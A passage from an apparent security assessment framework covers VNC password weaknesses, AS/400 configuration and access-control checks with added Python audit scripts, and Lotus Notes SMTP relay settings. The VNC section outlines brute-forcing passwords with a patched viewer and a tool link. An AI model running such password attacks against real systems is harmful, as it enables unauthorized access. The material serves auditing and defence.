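The https image and link are not reported, the three SMB-bound references are; a gateway would quarantine or rewrite the message, and a client-side check would refuse to render such references, which is the narrower form of the "disable HTML parsing" countermeasure.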
T.4 REMOTE ADMINISTRATION SECURITY
Some of the most common remote administration services are as follows:
• VNC
• Microsoft Terminal Server
• ControlIT
• PCAnywhere
T.4.1 VNC
VNC (Virtual Network Computing) is used widely by many system administrators for remote administration. It supports a web-based interface and a client interface. The client interface can be GUI-based as well; the client is known as the VNC viewer. VNC has a security feature which asks for a password before letting the client connect to the server. The problem with VNC is that its passwords are 8 characters or shorter and VNC has no concept of users. This makes dictionary attacks very easy. Patrick Oonk has written a patch for the VNC viewer which converts it into a dictionary-based brute forcer. The patch can be downloaded from http://www.securiteam.com/tools/Brute_forcing_VNC_passwords.html
Steps to be performed
1. Apply the patch to the VNC viewer
2. Specify the target and port to connect to
3. Specify the dictionary
4. Start cracking
Example Results
<Screenshot>
Observation
The attacker cracked the simple, dictionary-based password and gained access to the system.
Countermeasure
Use UNIX -localhost or Windows LoopbackOnly or kernel packet filters to restrict access to TCP services, e.g. to force users to tunnel their VNC sessions through SSH for more security.
U AS 400 SECURITY
U.1 USER IDENTIFICATION: SECURITY LEVEL
Description
The system parameter QSECURITY is set to level 30.
Analysis/Conclusion/Observation
Level 30
Impact
This level of AS/400 security provides for user authentication and security over the AS/400
object by the operating system. However, this level of security has a few disadvantages for
the integrity of the AS/400.
Countermeasures
The security level should be set to 40. In order to find out whether all applications which
currently run on the AS/400 will still run under security level 40, you can make use of
*AUTFAIL and *PGMFAIL in the audit-logging.
Tool[s]
By manual checking
Further Reading[s]
Remarks
U.2 USER IDENTIFICATION: KEYLOCK SWITCH
Description
The key lock switch is set to NORMAL.
Analysis/Conclusion/Observation
NORMAL.
Impact
The position of the key lock switch does not guarantee the integrity of the AS/400. The
system may be manually switched off and on.
Countermeasures
The key lock switch should be set to SECURE.
Tool[s]
By manual checking
Further Reading[s]
Remarks
U.3 USER IDENTIFICATION: KEY KEYLOCK SWITCH
Description
The key to the key lock switch is not kept in a secure place and is accessible by
unauthorised personnel.
Analysis/Conclusion/Observation
No
Impact
Unauthorised actions may be performed on the AS/400 such as the execution of an IPL.
Also, employees may be able to access the Dedicated Service Tools through which,
among other things, the password of QSECOFR may be reset.
Countermeasures
The key to the keylock switch should be kept in a secure place which is only accessible by
authorised personnel.
Tool[s]
By manual checking
Further Reading[s]
Remarks
USER IDENTIFICATION: SYSTEM VALUE QINACTITV
Description
The system value QINACTITV is set to more than one hour. This means that the system will take action after a workstation has been inactive for a time interval of more than one hour. What action the system will take depends on the system values QINACTMSGQ and QDSCJOBITV.
Analysis/Conclusion/Observation
More than 60
Impact
Because the system will only take any action after a workstation is inactive for more
than one hour, an active workstation may be left unattended by the user. This increases
the risk of unauthorised access to the workstation
Countermeasures
The value of the system parameter QINACTITV should be set to 20 minutes.
Tool[s]
By manual checking
Further Reading[s]
Remarks
U.4 USER IDENTIFICATION: SYSTEM VALUE QDSCJOBITV
Description
The system parameter QDSCJOBITV is set to less than 60 minutes.
Analysis/Conclusion/Observation
Less than 60
Impact
It is not recommended that a job be prematurely aborted and ended.
Countermeasures
The system parameter QDSCJOBITV should be increased to 180 (three hours).
Tool[s]
By manual checking
Further Reading[s]
Remarks
U.5 USER IDENTIFICATION: VIRTUAL DEVICES
Description
The system parameter QAUTOVRT is set to more than 10.
Analysis/Conclusion/Observation
More than 10
Impact
Because of this, an unauthorised person can try to guess a user password from one
physical device. The number of guesses he can make equals the value set for the system
parameter QAUTOVRT times the value set for the system parameter QMAXSIGN. This
increases the risk of unauthorised access to data, applications and system software.
Countermeasures
The system parameter QAUTOVRT should be set to zero.
Tool[s]
By manual checking
Further Reading[s]
Remarks
U.6 USER IDENTIFICATION: SYSTEM VALUE QLMTSECOFR
Description
The system parameter QLMTSECOFR is set to value 0. Because of this, user profiles with powerful special authorities (*ALLOBJ and *SERVICE) are able to log on to the system from any available workstation.
Analysis/Conclusion/Observation
Value 0
Impact
The possibility to use user profiles with powerful special authorities from any workstation,
decreases the effectiveness of logical access controls. Through limiting the number of
workstations that can be used to work with powerful user profiles, logical access controls
over these user profiles is increased with physical access controls over the workstations
which these user profiles may use. This increases the overall level of security.
Countermeasures
The system parameter QLMTSECOFR should be set to one. Thus, user profiles with
powerful special authorities (*ALLOBJ and *SERVICE) may only be used from pre-defined
workstations.
Tool[s]
By manual checking
Further Reading[s]
Remarks
U.7 USER IDENTIFICATION: LIMITED DEVICE SESSIONS SYSTEM LEVEL
Description
The system parameter QLMTDEVSSN is set to value 0. This enables the user to logon to
the system from various physical workstations at the same time. It also enables the user to
have more than one session simultaneously active.
Analysis/Conclusion/Observation
Value 0
Impact
The possibility for users to log on to the system through various physical workstations at
the same time may lead to user profiles being shared by different users. Also, workstations
may be left unattended by the rightful user. This may lead to unauthorised access to data,
applications and system software.
Countermeasures
The system parameter QLMTDEVSSN should be set to value 1.
Remark:
If certain users need to have more than one session active at the same time, an exception
can be made for these users on the level of their individual user profile.
Tool[s]
By manual checking
Further Reading[s]
Remarks
U.8 USER IDENTIFICATION: SYSTEM PARAMETER QMAXSGNACN
Description
The system parameter QMAXSGNACN is set to value 2.
Analysis/Conclusion/Observation
Value 2
Impact
If only the virtual device is blocked, an unauthorised individual may try and guess the
password of the same user profile again on the same physical device, using another virtual
device.
Countermeasures
The virtual device as well as the user profile should be blocked when the maximum number of unauthorised access attempts has been reached. This can be achieved by setting the system parameter QMAXSGNACN to three.
Tool[s]
By manual checking
Further Reading[s]
Remarks
This risk does not exist when the system parameter QAUTOVRT is set to zero. In this case, virtual devices are not automatically configured. If every user profile only has one virtual device, an unauthorised individual cannot log on to the system again under the same user profile.
U.9 USER IDENTIFICATION: PUBLIC AUTHORITIES
Description
The system parameter QCRTAUT is set to *CHANGE. Because of this, the public has
*CHANGE rights over newly created objects.
Analysis/Conclusion/Observation
*CHANGE
Impact
The public authority to change newly created objects might sometimes be too extensive.
This may endanger the integrity of the AS/400 data.
Countermeasures
The system parameter QCRTAUT should be set to *USE. In this way, newly created objects may only be used by the public.
Tool[s]
By manual checking
Further Reading[s]
Remarks
Sometimes (e.g. for devices) the right *USE may be too limited to work with the object. In
these cases, the public may need more extensive rights over the object (*CHANGE rights
should be sufficient).
U.10 USER IDENTIFICATION: AUTHORITY ADOPTION
Description
Applications adopt more authority than required to meet the application requirements.
Analysis/Conclusion/Observation
No
Impact
Allowing a program to run using adopted authority is an intentional release of control. You
permit the user to have authority to objects, and possibly special authority, which the user
would not normally have.
Countermeasures
Applications should be adopting the minimum authority required to meet the application
requirements.
Tool[s]
By manual checking
Further Reading[s]
Remarks
U.11 USER IDENTIFICATION: MACHINE ROOM
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
The machine room should be water-proofed and fire-proofed. The door should be locked to
control entrance. Only authorized personnel should be able to gain access to the
machine room. Every entry should be logged to help prevent unauthorized access.
Tool[s]
Manual check
Further Reading[s]
Remarks
U.12 USER IDENTIFICATION: UPS (UNINTERRUPTIBLE POWER SUPPLY)
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
You should determine whether or not the company has a UPS system. If it does, you
should check UPS-related controls to ensure the UPS allows for a normal shutdown in
case of a power outage.
Tool[s]
Manual check
Further Reading[s]
Remarks
U.13 USER IDENTIFICATION: WORKSTATION / TERMINAL
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Company policy should prohibit recording confidential information (for example, sign-on
and other activities that involve password entry) on workstation/terminal record/play keys.
You should perform a spot check of workstations/terminals to verify compliance with
these policies. If there is a key for the keyboard lock at the workstation/terminal, ensure the
keyboard is locked and the key is removed when the workstation/terminal is inactive.
Tool[s]
Manual check
Further Reading[s]
Remarks
U.14 USER IDENTIFICATION: BACKUP TAPES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Consult the plan to protect the business processes to see how the backup routines,
including labeling and storing of the tapes, are performed. Verify that these routines are
followed, and check if anyone is able to steal, duplicate or borrow a tape without being
noticed.
Tool[s]
Manual check
Further Reading[s]
Remarks
U.15 USER IDENTIFICATION: REGISTER A NEW USER
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Some sort of routine must be followed when a new user profile is created. The
person who registers new users should receive a form that contains at least the
following:
• The name of the user
• The user class
• Any deviation from the default values in the CRTUSRPRF command, verified
by the person responsible for the AS/400 security
• Authority to the applications, verified by the application owners
Tool[s]
Manual check
Further Reading[s]
Remarks
U.16 USER IDENTIFICATION: REGISTER A USER WHO LEAVES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Some sort of routine must be followed when a user leaves the company or takes
a leave of absence. A form should be filled out and given to the person
responsible for AS/400 security.
Before deleting a user profile, the following must be checked:
• Whether the user has programs that adopt his authority
• Whether the user owns other objects; if so, who decides whether they are to be deleted or
transferred to a new owner
Tool[s]
Manual check
Further Reading[s]
Remarks
U.17 USER IDENTIFICATION: APPLICATION AND OWNERSHIP
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
• Which applications should be secured.
• Which applications (if any) must not be secured.
• Which applications are continuously being changed, and which are frozen.
• Which libraries are included in an application.
• Who within the company are the owners of the different applications.
• Which user profiles own the objects within an application. Ownership is
extremely important and plays a key role in a secure system.
• Who can request changes to an application, and how these requests for
changes are documented and carried out.
Tool[s]
Manual check
Further Reading[s]
Remarks
Note: QUSRTOOL has a program, CHGLIBOWN, that can change the owner of a library
and all the objects within the library. This is a very powerful tool.
Please don't use it until:
o The owner of the application agrees that a change should be made. The owner may
have detailed knowledge and must always be consulted.
o You have changed the owner of the library manually and seen that it works. Whenever
you make a change of ownership, you must be able to reverse the process if something
does not work properly afterwards.
o You know whether the library contains programs that adopt their owner's authority.
U.18 USER IDENTIFICATION: DAY-TO-DAY MONITORING
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
o New objects created by system users
o New users enrolled on the system
o Changes of object ownership - authorization not adjusted
o Changes of responsibilities - user group changed
o Temporary authorizations - not revoked
o New products installed
o Maintenance applied - security level lowered and not reset, and so on
The best way to keep an eye on what is happening on the system is to use the audit journal
(QAUDJRN). Many types of events, such as security violations, changes to user profiles,
work management, and network attributes, are logged in the journal receiver.
Tool[s]
Manual check
Further Reading[s]
Remarks
U.19 USER IDENTIFICATION: CRITICAL USER PROFILES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Critical User Profiles should be checked regularly, such as profiles with special authorities
and IBM-supplied user profiles where the default passwords are published.
Tool[s]
Manual check
Further Reading[s]
Remarks
U.20 USER IDENTIFICATION: PRIVILEGED PROFILES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
All User Profiles with special authorities such as *ALLOBJ,
*SECADM and *AUDIT should be extracted and compared with an authorized list
of such users. The analysis should include other properties like
PASSWORD(*NONE).
The DSPAUTUSR command will print the following information for all User
Profiles:
• User Profile name
• Group Profile name
• Date password was last changed
• An indicator if the password is *NONE
• Description text
To do this, enter:
DSPAUTUSR OUTPUT(*PRINT)
To print other User Profile information, enter:
DSPUSRPRF USRPRF(User Profile) TYPE(*ALL) OUTPUT(*PRINT)
Tool[s]
Manual check
Further Reading[s]
Remarks
U.21 USER IDENTIFICATION: IBM-SUPPLIED USER PROFILES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
IBM-supplied user profiles should be checked in the following ways:
For the user profiles designed as object owners or for batch processing, you should verify
that their passwords are all *NONE to prevent them being used to sign on to the system.
For the user profiles shipped with default passwords, you should verify that these
passwords cannot be used to sign on. The default passwords should be changed
immediately after installing the system. In addition, they should be changed periodically (in
case they become known, are reset to the defaults, and so on). You should also verify
that the remaining parameters, apart from the password, have not been changed.
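An added example, not part of the framework, of automating the U.20 and U.21 checks: it parses a constructed, simplified rendering of the DSPAUTUSR OUTPUT(*PRINT) listing (profile, group, date the password was last changed, whether the password is *NONE, text), compares the holders of *ALLOBJ, *SECADM and *AUDIT (taken here from a constructed dictionary standing in for DSPUSRPRF output) with an authorized list, and flags IBM-supplied profiles that have a password where *NONE is expected or whose password is older than a rotation period. The sets of IBM-supplied profiles, the authorized list and the 90-day period are assumptions for the example.

```python
"""Review of privileged and IBM-supplied user profiles (checks U.20 and U.21).

Added illustration. DSPAUTUSR_SAMPLE is a constructed, simplified version of what
DSPAUTUSR OUTPUT(*PRINT) lists, not real spooled output. Special authorities would
come from DSPUSRPRF; here they are a constructed dict.
"""
from datetime import date

# Constructed DSPAUTUSR-style lines: profile, group, last password change, *NONE?, text
DSPAUTUSR_SAMPLE = """\
ANALYST1   ACCTS     2024-03-02  NO   Accounts analyst
QDFTOWN    *NONE     1999-01-01  NO   Default object owner
QPGMR      *NONE     2023-01-15  NO   Programmer
QSECOFR    *NONE     2024-04-20  NO   Security officer
QSPL       *NONE     1999-01-01  YES  Spool owner
TEMPADM    *NONE     2024-04-28  NO   Temporary admin
"""

# Constructed special-authority data, as DSPUSRPRF would show per profile.
SPECIAL_AUTHORITIES = {
    "QSECOFR": {"*ALLOBJ", "*SECADM", "*AUDIT", "*SERVICE"},
    "TEMPADM": {"*ALLOBJ"},
    "ANALYST1": set(),
    "QPGMR": {"*JOBCTL"},
}

# Authorized holders of the special authorities named in U.20 (constructed list).
AUTHORIZED_PRIVILEGED = {"QSECOFR"}
WATCHED_AUTHORITIES = {"*ALLOBJ", "*SECADM", "*AUDIT"}

# Assumed classification of IBM-supplied profiles for this example; confirm against
# the IBM documentation for the release under review.
IBM_OWNER_OR_BATCH = {"QDFTOWN", "QSPL"}        # should have PASSWORD(*NONE)
IBM_DEFAULT_PASSWORD = {"QSECOFR", "QPGMR"}     # shipped with a default password
MAX_PASSWORD_AGE_DAYS = 90                      # rotation period; an assumption


def parse_dspautusr(text):
    """Turn the simplified listing into {profile: details}; text may contain spaces."""
    profiles = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, group, changed, none_flag, desc = line.split(None, 4)
        profiles[name] = {
            "group": group,
            "changed": date.fromisoformat(changed),
            "password_none": none_flag == "YES",
            "text": desc,
        }
    return profiles


def unauthorized_privileged(authorities, authorized=AUTHORIZED_PRIVILEGED):
    """Profiles holding a watched special authority without being on the approved list."""
    return sorted(p for p, auths in authorities.items()
                  if auths & WATCHED_AUTHORITIES and p not in authorized)


def ibm_profile_findings(profiles, review_date):
    """U.21: owner/batch profiles must have no password; default-password profiles rotated."""
    if isinstance(review_date, str):
        review_date = date.fromisoformat(review_date)
    findings = []
    for name in sorted(IBM_OWNER_OR_BATCH):
        p = profiles.get(name)
        if p and not p["password_none"]:
            findings.append(f"{name}: owner/batch profile has a password; set PASSWORD(*NONE)")
    for name in sorted(IBM_DEFAULT_PASSWORD):
        p = profiles.get(name)
        if p and (review_date - p["changed"]).days > MAX_PASSWORD_AGE_DAYS:
            findings.append(f"{name}: password last changed {p['changed']}, older than "
                            f"{MAX_PASSWORD_AGE_DAYS} days")
    return findings


if __name__ == "__main__":
    profiles = parse_dspautusr(DSPAUTUSR_SAMPLE)
    print("unauthorized privileged:", unauthorized_privileged(SPECIAL_AUTHORITIES))
    for finding in ibm_profile_findings(profiles, "2024-05-01"):
        print(finding)
```

The two halves of the check deliberately use different inputs: DSPAUTUSR is enough for the password questions, but the special authorities of each profile only appear in DSPUSRPRF output, which is why the page lists both commands.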
Tool[s]
Manual check
Further Reading[s]
Remarks
U.22 USER IDENTIFICATION: CRITICAL OBJECTS
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
The public and specific authority should be checked to see that it meets the security
guidelines or objectives.
List of Critical System Objects:
• QSYS
• QUSRSYS
• QHLPSYS
• QGPL
• QDOC
• QBASE
• QCTL
• QBATCH
• QINTER
• QCMN
Tool[s]
Manual check
Further Reading[s]
Remarks
U.23 USER IDENTIFICATION: EVENT MONITORING
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
The journal files and history log contain, among other information, the security-related
events that must be monitored. It is necessary that this information be extracted and
documented in security reports for management review. We suggest the following priorities:
1. Analyze the reported changes to security definitions and rules.
2. Analyze the access granted to highly critical objects.
3. Analyze the attempted violations.
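As an added illustration of reviewing the audit journal entries from check U.18 in the priority order given above (this is not code from the framework), the following Python script sorts constructed QAUDJRN-style entries into the three priorities. The entry type codes (AF, CP, PW, SV, OW, CA, ZC, ZR) are IBM i audit journal types; the simplified pipe-separated layout, the sample entries and the assignment of each type to a priority are assumptions made for the example.

```python
"""Triage of audit journal (QAUDJRN) entries into the three review priorities.

Added illustration for the ISSAF checks U.18 and U.23; the entries below are
constructed, not real DSPJRN output. Journal entry type codes (AF, CP, PW, SV,
OW, CA, ZC, ZR) are the IBM i audit types; which priority each one belongs to is
our reviewer's mapping, not a statement from the framework.
"""
from collections import Counter, defaultdict

PRIORITY_OF_TYPE = {
    "CP": 1, "SV": 1, "CA": 1, "OW": 1,   # 1: changes to security definitions and rules
    "ZC": 2, "ZR": 2,                      # 2: access to (critical) objects
    "AF": 3, "PW": 3,                      # 3: attempted violations
}
PRIORITY_LABEL = {1: "security definition changes",
                  2: "access to critical objects",
                  3: "attempted violations"}

# Critical libraries listed in check U.22; object-access entries elsewhere are not priority 2.
CRITICAL_LIBS = {"QSYS", "QUSRSYS", "QHLPSYS", "QGPL", "QDOC",
                 "QBASE", "QCTL", "QBATCH", "QINTER", "QCMN"}

# Constructed sample in a simplified "timestamp|type|user|job|library/object" layout.
SAMPLE = """\
2024-05-01 08:02:11|PW|ANALYST1|QPADEV0003|
2024-05-01 08:02:19|PW|ANALYST1|QPADEV0003|
2024-05-01 08:15:40|CP|QSECOFR|QPADEV0001|QSYS/ANALYST2
2024-05-01 09:01:05|ZR|BATCHUSR|BATCHJOB|QGPL/PAYROLL
2024-05-01 09:03:22|ZC|OPER1|QPADEV0007|APPLIB/ORDERS
2024-05-01 10:11:00|AF|TEMPUSR|QPADEV0009|SECURITY/GRPPRFR1
2024-05-01 11:30:45|SV|QSECOFR|QPADEV0001|QSYS/QSECURITY
2024-05-01 12:00:00|CO|DEVUSR|QPADEV0010|DEVLIB/NEWPGM
"""


def parse_entries(text):
    """Split the simplified layout into dicts; blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, etype, user, job, obj = line.split("|")
        entries.append({"time": ts, "type": etype, "user": user, "job": job, "object": obj})
    return entries


def triage(entries):
    """Return {priority: [entries]}; object-access entries count only for critical libraries."""
    buckets = defaultdict(list)
    for e in entries:
        prio = PRIORITY_OF_TYPE.get(e["type"])
        if prio is None:
            continue                      # CO, DO, ... are not on the review list
        if prio == 2:
            library = e["object"].partition("/")[0]
            if library not in CRITICAL_LIBS:
                continue
        buckets[prio].append(e)
    return dict(buckets)


def repeated_failures(entries, threshold=2):
    """Users with at least `threshold` invalid-password (PW) entries."""
    counts = Counter(e["user"] for e in entries if e["type"] == "PW")
    return {user: n for user, n in counts.items() if n >= threshold}


def report(entries):
    """Management-review text in the page's priority order."""
    buckets = triage(entries)
    lines = []
    for prio in (1, 2, 3):
        items = buckets.get(prio, [])
        lines.append(f"{prio}. {PRIORITY_LABEL[prio]}: {len(items)} entries")
        lines.extend(f"   {e['time']} {e['type']} {e['user']} {e['object'] or '-'}" for e in items)
    for user, n in sorted(repeated_failures(entries).items()):
        lines.append(f"   note: {n} failed sign-on attempts for {user}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(parse_entries(SAMPLE)))
```

Entries of types outside the mapping (CO in the sample) are left out of the report, and an object-access entry counts under priority 2 only when the object sits in one of the critical libraries from check U.22; the repeated-failure note ties the PW entries back to the QMAXSIGN and QMAXGNACN discussion in U.8.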
Tool[s]
Manual check
Further Reading[s]
Remarks
U.24 USER IDENTIFICATION: ACCESS TO CRITICAL OBJECTS
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
The access authority (but not an access log) to a specific object can be printed
with the following command:
DSPOBJAUT OBJ(library/object) OBJTYPE(type) OUTPUT(*PRINT)
For the program GRPPRFR1 in library SECURITY, you would enter:
DSPOBJAUT OBJ(SECURITY/GRPPRFR1) OBJTYPE(*PGM) OUTPUT(*PRINT)
For the users in the authorization list (if one exists for the object), you can use
the following command:
DSPAUTL AUTL(AUTL1) OUTPUT(*PRINT)
Where AUTL1 is the name of the authorization list.
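The following added Python example (not the framework's own code) applies checks U.22 and U.24 together: it parses a constructed, simplified rendering of DSPOBJAUT OUTPUT(*PRINT) for several objects, flags *PUBLIC authority above a per-library ceiling (*USE for the critical system libraries, following U.9, and an assumed *EXCLUDE for a SECURITY library), flags *ALL grants to anyone other than the owner, and points to DSPAUTL where an authorization list applies. The report layout, the object names and the ceilings are assumptions.

```python
"""Public and specific authority review for critical objects (checks U.22 and U.24).

Added illustration. SAMPLE is a constructed, simplified rendering of what
DSPOBJAUT OUTPUT(*PRINT) reports per object (owner, authorization list, then
one line per user with the object authority); it is not the real spooled layout.
"""

# Object authorities in increasing order of what they permit.
RANK = {"*EXCLUDE": 0, "*USE": 1, "*CHANGE": 2, "*ALL": 3}

CRITICAL_LIBS = ["QSYS", "QUSRSYS", "QHLPSYS", "QGPL", "QDOC",
                 "QBASE", "QCTL", "QBATCH", "QINTER", "QCMN"]

# Highest acceptable *PUBLIC authority per library: *USE for the critical system
# libraries (the U.9 recommendation) and, as an assumption for this example,
# *EXCLUDE for a library holding security programs.
PUBLIC_CEILING = {lib: "*USE" for lib in CRITICAL_LIBS}
PUBLIC_CEILING["SECURITY"] = "*EXCLUDE"

SAMPLE = """\
Object: QGPL/PAYROLL  Type: *FILE  Owner: PAYOWN  AUTL: *NONE
  *PUBLIC    *CHANGE
  PAYCLERK   *USE
  TEMPUSR    *ALL
Object: SECURITY/GRPPRFR1  Type: *PGM  Owner: SECOWN  AUTL: AUTL1
  *PUBLIC    *EXCLUDE
  SECOWN     *ALL
Object: APPLIB/ORDERS  Type: *FILE  Owner: APPOWN  AUTL: *NONE
  *PUBLIC    *CHANGE
"""


def parse_dspobjaut(text):
    """Return one dict per object: object, type, owner, autl and {user: authority}."""
    objects, current = [], None
    for line in text.splitlines():
        if line.startswith("Object:"):
            parts = line.split()    # ['Object:', lib/obj, 'Type:', t, 'Owner:', o, 'AUTL:', a]
            current = {"object": parts[1], "type": parts[3], "owner": parts[5],
                       "autl": parts[7], "users": {}}
            objects.append(current)
        elif line.strip():
            user, authority = line.split()
            current["users"][user] = authority
    return objects


def review(objects, ceiling=PUBLIC_CEILING, approved_all=frozenset()):
    """Findings: *PUBLIC above the library ceiling, *ALL held by non-owners, AUTL pointers."""
    findings = []
    for o in objects:
        library = o["object"].partition("/")[0]
        limit = ceiling.get(library)
        public = o["users"].get("*PUBLIC", "*EXCLUDE")
        if limit is not None and RANK[public] > RANK[limit]:
            findings.append(f"{o['object']}: *PUBLIC has {public}, ceiling for {library} is {limit}")
        for user, authority in o["users"].items():
            if (user != "*PUBLIC" and authority == "*ALL"
                    and user != o["owner"] and user not in approved_all):
                findings.append(f"{o['object']}: {user} holds *ALL but is not the owner")
        if o["autl"] != "*NONE":
            findings.append(f"{o['object']}: secured by authorization list {o['autl']}; "
                            f"review its users with DSPAUTL AUTL({o['autl']}) OUTPUT(*PRINT)")
    return findings


if __name__ == "__main__":
    for finding in review(parse_dspobjaut(SAMPLE)):
        print(finding)
```

Objects in libraries without a ceiling (APPLIB in the sample) produce no public-authority finding; the point of the ceiling table is that the security guidelines the page refers to are expressed per library, and the reviewer extends the table rather than the code.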
Tool[s]
Manual check
Further Reading[s]
Remarks
U.25 USER IDENTIFICATION: SECURITY-RELATED SYSTEM VALUES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Security-related system values (for example,
QSECURITY, QMAXSIGN, and so on) should be reviewed to see that effective global
security values have been established.
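As an added example tying checks U.8, U.9 and U.25 together (this is not code from the framework), the Python script below compares a constructed system value listing with a baseline. QMAXSGNACN is the IBM name of the value the page writes as QMAXGNACN; the expected values QMAXSGNACN=3, QCRTAUT=*USE and QAUTVRT=0 follow the page, while the QSECURITY minimum of 40 and the QMAXSIGN maximum of 5 are assumptions made for the example, not figures stated by the framework.

```python
"""Baseline check of security-related system values (checks U.8, U.9 and U.25).

Added illustration. WEAK is a constructed "NAME  VALUE" listing, not real
DSPSYSVAL output. Expected values for QMAXSGNACN (3), QCRTAUT (*USE) and
QAUTVRT (0) follow the page; the QSECURITY minimum of 40 and the QMAXSIGN
maximum of 5 are our assumptions for this example.
"""

BASELINE = {
    "QSECURITY":  ("min", 40),
    "QMAXSIGN":   ("max", 5),       # *NOMAX never satisfies a maximum
    "QMAXSGNACN": ("eq", 3),        # disable both the device and the user profile
    "QCRTAUT":    ("in", {"*USE", "*EXCLUDE"}),
    "QAUTVRT":    ("eq", 0),        # no automatic virtual device configuration
}

WEAK = """\
QSECURITY    40
QMAXSIGN     *NOMAX
QMAXSGNACN   2
QCRTAUT      *CHANGE
QAUTVRT      9999
"""


def parse_sysvals(text):
    """Read "NAME VALUE" lines into a dict; values stay as strings."""
    values = {}
    for line in text.splitlines():
        if line.strip():
            name, value = line.split(None, 1)
            values[name] = value.strip()
    return values


def _as_int(value):
    try:
        return int(value)
    except ValueError:
        return None


def check_value(name, value, rule):
    """True when `value` satisfies the baseline rule for `name`."""
    kind, expected = rule
    if kind == "in":
        return value in expected
    number = _as_int(value)
    if number is None:                # e.g. *NOMAX or a missing value
        return False
    return {"min": number >= expected, "max": number <= expected, "eq": number == expected}[kind]


def audit_sysvals(values, baseline=BASELINE):
    """Return [(name, current, expected, severity)] for every value off baseline."""
    findings = []
    for name, rule in baseline.items():
        current = values.get(name, "<not listed>")
        if current != "<not listed>" and check_value(name, current, rule):
            continue
        severity = "high"
        # Page remark for U.8: with QAUTVRT at 0 a blocked virtual device cannot be
        # replaced by a new one, so the QMAXSGNACN finding is only informational.
        if name == "QMAXSGNACN" and _as_int(values.get("QAUTVRT", "")) == 0:
            severity = "info"
        findings.append((name, current, rule[1], severity))
    return findings


if __name__ == "__main__":
    for name, current, expected, severity in audit_sysvals(parse_sysvals(WEAK)):
        print(f"{severity:4} {name}: is {current}, baseline {expected}")
```

The QAUTVRT remark under U.8 is encoded as an edge case: when QAUTVRT is 0 the QMAXSGNACN finding is reported as informational rather than high, since a blocked virtual device cannot then be replaced by an automatically configured one.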
Tool[s]
Manual check
Further Reading[s]
Remarks
V LOTUS NOTES SECURITY
Each check below is recorded with its Sr. No., the check, the control, and a compliance result of [Yes/No/N.A.].
1. Securing the ID File
Controlling the ID file and password is rarely addressed properly. The password is associated with the Notes ID file. Authentication is with the ID file, not a server. There can be more than one copy of the ID file for any person. Each copy can have a different password or they can all have the same password. If a user has multiple computers (home, work, London, Paris) the user can have an ID file on each PC, each with a different password. If the user changes their password on one PC it won't sync to the others and it won't affect the ability of the user to log on with another copy of the ID file. Each copy is independent of the others. Therefore if the Notes admin creates the file, he also knows the password and often keeps a copy for himself. Therefore the Notes admin always has access to users' emails.
An ID Management Solution: One solution for securely managing IDs is for two parties to be involved in the creation of the ID, perhaps the Notes admin and a representative from HR. The Notes admin will generate the ID and HR will create (a unique password) and hold the password. HR can inform the user of the initial password and the Notes admin can deliver the ID. That way no one person or group has both the ID and password in their possession except the end-user.
Expiration of ID Files: All ID files must be set to expire in at least 2 years.
2. SMTP Relaying is secured
Spammers constantly look out for SMTP gateways that allow relaying of email from any user. The Lotus Notes server must be configured to relay emails only for authorized users. This feature is available in Lotus Notes version 4.6.2 or later. In NOTES.INI, set:
SMTPMTA_REJECT_RELAYS=1
SMTP_OCH_REJECT_SMTP_ORIGINATED_MESSAGES=1 (NOT "SMTPMTA_OCH_..")
SMTPMTA_RELAY_FORWARDS=1
WARNING: If SMTPMTA_OCH_REJECT_SMTP_ORIGINATED_MESSAGES=1 is used, the host will still relay. Check your spelling!
For Notes 5.x: The configuration document in the Domino Directory has a section for SMTP Inbound Controls. Enter a * in both of the following fields:
"Deny messages from external internet domains to be sent to the following internet domains:"
"Deny messages from the following external internet hosts to be sent to external internet domains:"
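An added example, not from the framework or from Lotus, of checking the NOTES.INI settings listed under item 2 for a 4.6.x SMTP MTA. The two NOTES.INI excerpts are constructed; the required keys and the misspelling warning come from the text above, and the parser and report are ours.

```python
"""NOTES.INI anti-relay settings check for a Domino 4.6.x SMTP MTA (checklist item 2).

Added illustration, not part of the framework. WEAK_INI and FIXED_INI are
constructed excerpts. The required keys and the misspelling warning come from
the checklist; parsing and reporting are ours.
"""

REQUIRED = {
    "SMTPMTA_REJECT_RELAYS": "1",
    "SMTP_OCH_REJECT_SMTP_ORIGINATED_MESSAGES": "1",
    "SMTPMTA_RELAY_FORWARDS": "1",
}
# A key that looks right but is not the documented one: the file accepts it,
# the server ignores it, and the host keeps relaying.
MISSPELLED = {
    "SMTPMTA_OCH_REJECT_SMTP_ORIGINATED_MESSAGES": "SMTP_OCH_REJECT_SMTP_ORIGINATED_MESSAGES",
}

WEAK_INI = """\
; constructed excerpt, weak configuration
ServerTasks=Router,Replica,SMTPMTA
SMTPMTA_REJECT_RELAYS=1
SMTPMTA_OCH_REJECT_SMTP_ORIGINATED_MESSAGES=1
"""

FIXED_INI = """\
; constructed excerpt, corrected configuration
ServerTasks=Router,Replica,SMTPMTA
SMTPMTA_REJECT_RELAYS=1
SMTP_OCH_REJECT_SMTP_ORIGINATED_MESSAGES=1
SMTPMTA_RELAY_FORWARDS=1
"""


def parse_notes_ini(text):
    """NOTES.INI is KEY=VALUE per line; ';' starts a comment.

    Keys are normalised to upper case so that a difference in case does not
    hide a setting from the check.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().upper()] = value.strip()
    return settings


def relay_findings(settings):
    """Missing or wrong required settings first, then look-alike keys the server ignores."""
    findings = []
    for key, wanted in REQUIRED.items():
        if settings.get(key) != wanted:
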